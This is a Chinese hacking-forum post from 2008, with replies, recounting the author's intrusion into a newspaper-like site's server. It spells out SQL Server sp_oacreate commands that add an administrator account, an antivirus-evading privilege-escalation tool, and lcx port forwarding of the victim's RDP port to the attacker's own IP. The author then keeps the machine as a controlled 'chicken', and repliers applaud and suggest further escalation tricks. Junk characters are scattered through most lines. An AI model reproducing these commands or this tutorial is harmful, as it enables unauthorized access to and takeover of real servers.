[原创文章] 【原创】小鸡，别跑（内网提权篇） 内网, 小鸡, 原创

上帝的爱

文章作者:上帝之爱   s* A* p$ F8 [7 [3 \, S
原创文章，转载注明出处！2 c  l# j1 |5 S" H. Q  D
在此感谢冰冷的太阳（icysun）的提携！6 c1 Y0 m8 c! L: ?3 Y

5 ]! [% ~1 d5 o& u" r! P+ I: sPS:前言！又是一个双休日！我很喜欢双休日通宵！（似乎全是废话）上线后在那侃的热火朝天，突然太阳发过来一句话：把你的马弄几个过来！我很纳闷啊？不明白！最后问清楚
2 }( ]: L, a6 S; g了他是要搞一个站，一句话成功了！但是大马老是被杀或者是其他原因打不开大马地址！我正好也无事干，我跟着他一块干吧！' ~% X1 F  t/ H) H4 ?
正文：
4 Q1 f7 Y2 Y+ Y+ r   他说是DB权限，我于是打开站点一看，中国XXX报！呵呵呵！不管三七二十一，掂着我的啊D对着他射了起来！如图DB权限！也成功的列出了目录，找到了路径！汗死！太阳都弄
5 w1 d7 k3 H9 U# q# I! G到一句话了，我还在这里浪费什么感情和大好时光啊！问他要了之后，把自己的大马搞了上去，这时候太阳因为群里的事情忙，就先让我搞！大哥发话了，能不听吗？我进去后，
* U$ k- Z  P! g! @# I! |习惯性的扫描了一下端口以及上传了CMD，米有开放43958的端口，最后也米有找到pcanywhere之类的玩意！我人品很是不好,今晚本来就因为之前的龌龊事情郁闷了半天，在太阳面
$ Q: l; }3 r" n0 J前丢大人了，所以这个站的服务器我一定要日下来！既然开放了1433端口，那只有通过SQL来提权了，真他妈的是人倒霉时候，喝凉水都塞牙啊！记得自己的一个工具怎么也找不到0 u6 T0 I. c3 R
了，NND，郁闷！这时候记得他走时候说过conn.asp的路径，我想起了SQL提权！于是我翻了翻聊天记录（他当时说时候，我没仔细看！在虚拟机里，聊QQ很麻烦，所以只是粗略的) v/ M$ ~6 Y- E5 y- q3 U8 ]3 V+ Y0 K
扫一眼）我去了路径看了看！找到了之后于是准备通过SQL来提权了！这里给不会的朋友说一下命令（也可以自己网上搜索）：+ O' G* Z5 I5 R( ?
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
2 {. d3 r: B* T+ |% d6 a5 L. keclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 ( n! c; {9 U) Q+ Y  q
/add'  --添加新用户。2 J6 i$ p$ A/ t& }" {% d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup
/ f/ W' B1 |/ B! p0 o) ladministrators 新用户 /add'  --把用户加到管理组
4 o+ B' K/ z6 u; H; d: u      有时候不行的话，不妨去试着激活guest！NND，失败！汗死！那咋办呢？不好意思去问太阳，他当时忙只是粗略的说了几种方法，米有办法，一个一个的测试吧！对了，我" [5 Z' O! R4 m, \/ ]- M
刚才不是上传了CMD吗？看看啥系统吧！不错，还可以执行命令！2003的！我记得上次在叶子转的时候，论坛就有一个喜欢检测明星站点的老是说牛人博客上的提权工具！正好我这
- Q4 ~1 g- Q0 M8 T# g个不是符合吗？于是立马去down了一个，记得我在C:\Program Files下浏览时候，看到的杀毒软件是卡巴斯基7.0，我害怕被杀啊！那不就更米有戏了吗？我的是NOD32，测试是可- d% F, F5 h* l) S$ q
以的，于是好不容易找了一个装卡巴的朋友让他帮我查杀一下！一会他告诉我：米有被杀！这下我放心了！一路高歌，直接上传上去，还真米有被杀！赶紧添加用户，靠！可以啊' T) V. u' U- u8 h
！发现添加上去了，这时候离成功似乎只有一步之遥了！0 G1 x2 W3 ~- M* N
    这个服务器是内网，那就需要用LCX转发端口了！找了一个免杀的lcx.exe(越来越发现免杀的作用了，日，这幸亏靠前几天死皮赖脸的问朋友要，打死我以后也要学习）lcx的8 J/ o- b2 k3 h% `/ Q% c1 @4 `! ?- b
具体使用方法你运行后，会提示的！不会的网上搜搜！于是我设置了路由转发了51端口
6 b7 I, v- d4 I, G) {, [开始在肉鸡上执行：+ V2 n; |' q. R* P" B
lcx.exe -slave 你的IP 51（端口） 肉鸡IP 3389   
0 W" W4 q; z- S+ {/ l7 m3 s6 M意思是将肉鸡的3389转发到本机的51端口上
) J8 o! }( e" Y" ^3 B% b8 Y! s/ e" ~0 {5 h2 p
然后我在本机执行：
8 U8 a: k+ @* C' C6 Plcx.exe -listen 51 20201 U! Y( a1 b- Q
意思是监听51端口转发到本机的2020端口上# A  t" _- t7 @. T( M+ o; O/ L
成功后，CMD下会有显示的，这时候我登陆本地127.0.0.1：2020（不懂的自己理下思路想想）. c. p6 a; P# ~6 g+ J
成功登陆了！郁闷的事情出来，我把刚才添加的账户和密码输入，突然跳出来一个窗口，意思是要有权限，NND，已经是管理员了，还要什么权限！也许是今晚通宵的原因吧！我又
2 i, Z( N/ r9 O$ S! G0 d% W不好意思的去打扰太阳，问他，他说：你确定你输入是你建立的密码？原先脑子糊涂了！竟然忘记建立的密码了，我为了防止别人社工，密码很少一样的！太多了忘记了！最后试
, h! J+ y( k) ~4 B/ l% h, o* |" ?了三次，把刚才还在脑海印象的三个密码试出来了！被太阳严重鄙视了一下！日,人老了不中用了！重新输入正确账号和密码成功进入，另外也米有发现shift后门，看来这可能是
# [% p4 _6 i  c) f, }一台干净的服务器，赶紧设置一下，保护“肉鸡”，防止别人把我的“鸡”干了！进去后发现了很多网页，记得114best的时候，是五个站！仔细看了下才知道是一些二级域名。  e0 P$ O1 s; k$ A; ~9 v* H
这个服务器还不错，配置只能算一般！安装了卡巴和超级巡警！另外我也做了一些设置，也差不多·算安全了，只要管理员不T我，我应该会老老实实呆在这里的！

zhuyahui

。。。
! q- q$ u  _0 F4 `/ z. a" o0 }9 F  a' B$ k  K  u' V
欢迎 上帝的爱 经常经常回来 授课~

超超

我中午就给审核了！！！！！！！！！！！！！我冤枉啊！！！！！！！！！

zhuyahui

哈哈。
! D* {2 @/ J6 @; K6 z: k提个建议。8 p9 u6 l0 f; P( O+ Q
下次麻烦上帝的爱 把图放在你步骤上。3 E/ D4 B3 |4 {5 v9 L
就是说到哪了 就把图帖到那。; G/ y7 O7 p8 R# k0 y6 N1 b& a
谢谢勒~

上帝的爱

原帖由 zhuyahui 于 2008-11-8 19:33 发表 # K2 y% F6 ~0 y) W
哈哈。* ]" [; I, C4 A" m
提个建议。( v5 F, @9 s5 w! S6 u& D
下次麻烦上帝的爱 把图放在你步骤上。# \0 s1 `. k) X. E3 n  i! g
就是说到哪了 就把图帖到那。
1 Y. x. q2 l( q  T6 n0 L; q谢谢勒~

# x5 b6 z1 U8 ~  [' n
) f& U% f+ C. `2 b& j; k6 D& R" V# X- S; h+ M5 \5 x* P$ d& h
比较懒！

hilarylove

上帝的爱。强悍啊。。真够牛逼的，。。。支持

上帝的爱

原帖由 hilarylove 于 2008-11-9 00:58 发表
- v5 X- n5 K: i; s+ K: b上帝的爱。强悍啊。。真够牛逼的，。。。支持

$ k2 K) z. N( g# z+ o( K  j: s! }% G4 R2 Z4 T4 m

7 ^% o$ ?% I! ~. K* S努力吧！你有一天会比我更牛逼！到时候你就觉得我是菜鸟了

wmmy

文章没有仔细看，但是看到图上有个DB权限，DB权限可以直接写入启动项提权。可以把这个方法一起写入文章中，并且可以提下如何修补漏洞。 在攻与防的对立统一中寻求突破！！！

無盡空虛

菜鸟有点难啊~~~

猪猪

不按顺序 一下子真看不明白 不适合我们菜鸟看

上帝的爱

原帖由 wmmy 于 2008-11-9 05:45 发表 * c7 @8 \+ _) Z9 I/ a9 E# Z# ]0 I% ~
文章没有仔细看，但是看到图上有个DB权限，DB权限可以直接写入启动项提权。可以把这个方法一起写入文章中，并且可以提下如何修补漏洞。 在攻与防的对立统一中寻求突破！！！

5 Y+ v$ `. t& M' D$ o' @; {

9 |$ ~1 Q6 X" p- ?* T( b) O/ y! l, J9 Q* F8 ~8 w# m" s9 P# |2 G
写入启动项，呵呵呵！知道，但是你不觉得有点麻烦，直接搞，拿到权限，不是很好！

2046a

~支持原创 ~4G内存:L

冰吻六秒钟

学习下 怎么我不会用工具啊

lr163

呵呵，学习了，谢谢楼主的分享！

在意z

谢谢楼主分享技术。。。